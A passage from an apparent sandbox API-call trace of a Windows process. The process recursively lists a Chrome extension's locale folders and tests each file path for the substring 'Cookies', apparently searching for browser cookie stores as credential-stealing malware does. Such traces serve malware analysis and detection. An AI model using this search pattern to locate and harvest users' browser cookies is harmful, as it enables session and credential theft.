Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB" [0163.280] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.280] GetProcessHeap () returned 0x8e0000 [0163.280] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0163.280] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB") returned 140 [0163.280] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB") returned 140 [0163.280] lstrlenW (lpString="\\*.*") returned 4 [0163.280] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB" [0163.280] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\*.*" [0163.280] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857e1690, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.281] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.281] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857e1690, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.281] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.281] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.281] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859abe80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd6, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.281] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB") returned 140 [0163.281] lstrlenW (lpString="\\") returned 1 [0163.281] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB" [0163.281] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\" [0163.281] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\") returned 141 [0163.281] lstrlenW (lpString="messages.json") returned 13 [0163.281] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\" [0163.281] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" [0163.281] VirtualQuery (in: lpAddress=0x9174d0, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.281] GetProcessHeap () returned 0x8e0000 [0163.281] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9174d0 | out: hHeap=0x8e0000) returned 1 [0163.281] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json", lpSrch="Cookies") returned 0x0 [0163.281] VirtualQuery (in: lpAddress=0x9175f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.281] GetProcessHeap () returned 0x8e0000 [0163.281] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9175f8 | out: hHeap=0x8e0000) returned 1 [0163.281] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859abe80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd6, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.281] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.284] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="en_US", cAlternateFileName="")) returned 1 [0163.284] lstrcmpiW (lpString1="en_US", lpString2=".") returned 1 [0163.284] lstrcmpiW (lpString1="en_US", lpString2="..") returned 1 [0163.285] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.285] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.285] lstrlenW (lpString="\\") returned 1 [0163.285] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.285] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.285] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.285] lstrlenW (lpString="en_US") returned 5 [0163.285] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.285] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="en_US" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US" [0163.285] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US" [0163.285] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\*.*" [0163.285] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.285] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.285] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.285] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.285] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.285] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859abe80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.285] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US") returned 140 [0163.285] lstrlenW (lpString="\\") returned 1 [0163.286] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US" [0163.286] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\" [0163.286] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\") returned 141 [0163.286] lstrlenW (lpString="messages.json") returned 13 [0163.286] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\" [0163.286] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" [0163.286] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json", lpSrch="Cookies") returned 0x0 [0163.286] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859abe80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.286] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.286] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="es", cAlternateFileName="")) returned 1 [0163.286] lstrcmpiW (lpString1="es", lpString2=".") returned 1 [0163.286] lstrcmpiW (lpString1="es", lpString2="..") returned 1 [0163.286] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.286] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.286] lstrlenW (lpString="\\") returned 1 [0163.286] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.286] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.286] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.286] lstrlenW (lpString="es") returned 2 [0163.286] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.286] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es" [0163.287] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es" [0163.287] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\*.*" [0163.287] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.287] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.287] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, 